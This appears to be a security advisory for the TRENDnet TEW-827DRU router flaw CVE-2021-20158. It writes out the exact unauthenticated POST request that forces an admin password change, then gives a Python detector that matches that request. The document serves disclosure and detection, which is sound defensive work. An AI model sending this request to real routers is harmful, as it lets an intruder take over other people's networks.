Trendnet AC2600 TEW-827DRU Unauthenticated Admin Password Change



Application Details

TRENDnet’s AC2600 MU-MIMO WiFi Router, model TEW-827DRU, is built to perform in a busy connected home. This dual-band router generates two quad-stream WiFi networks—a 1,733Mbps WiFi AC and a concurrent 800Mbps WiFi N network.


Vulnerability

TRENDnet AC2600 TEW-827DRU routers could allow a remote attacker to bypass security restrictions, caused by the presence of a hidden administrative command.


Identification

By sending a specially crafted request, an attacker could exploit this vulnerability to force the change of the admin password.


POST /apply_sec.cgi

ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

Detection

By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to force the change of the admin password.
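
The matching described above, as an added example (not Idappcom's signature 8022354 or its traffic file): a Python check over raw HTTP requests that flags a POST to /apply_sec.cgi carrying action=tools_admin_elecom and an admin_password field. The sample requests, the host name router.example and the function names are constructed for illustration, and the check does not inspect authentication state.

```python
from urllib.parse import parse_qs, urlsplit

HIDDEN_ACTION = "tools_admin_elecom"   # action value from the request on this page
TARGET_PATH = "/apply_sec.cgi"         # endpoint from the request on this page


def is_password_change_attempt(raw_request: bytes) -> bool:
    """Return True if a raw HTTP request matches the request shown on this page."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) != 3:
        return False                   # not a well-formed request line
    method, target, _version = parts
    if method != "POST" or urlsplit(target).path != TARGET_PATH:
        return False
    # parse_qs percent-decodes field names and values, so the match is made
    # on the normalised form rather than on the raw bytes of the body.
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return HIDDEN_ACTION in fields.get("action", []) and "admin_password" in fields


def _req(method: str, path: str, body: str) -> bytes:
    """Build a constructed sample request (hypothetical helper for this example)."""
    return (f"{method} {path} HTTP/1.1\r\nHost: router.example\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode("latin-1")


# Request body as shown on this page; the other samples are constructed.
PAGE_BODY = ("ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value"
             "&html_response_return_page=dummy_value&method=tools&admin_password=testing123")
SAMPLES = {
    "page_request": _req("POST", "/apply_sec.cgi", PAGE_BODY),
    "encoded_action": _req("POST", "/apply_sec.cgi",
                           PAGE_BODY.replace("_admin_", "%5Fadmin%5F")),
    "other_action": _req("POST", "/apply_sec.cgi", "ccp_act=set&action=other_value"),
    "wrong_method": _req("GET", "/apply_sec.cgi", ""),
}


def scan(samples: dict) -> dict:
    """Map each sample name to whether it would raise an alert."""
    return {name: is_password_change_attempt(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hit in scan(SAMPLES).items():
        print(f"{name}: {'ALERT' if hit else 'ok'}")
```

The check reports only whether a request matched and never records the submitted admin_password value, so alert logs do not end up holding credentials.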


Coverage

Idappcom has created signature 8022354 along with a corresponding traffic file.


References

CVE-2021-20158

NIST NVD (CVE-2021-20158)


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional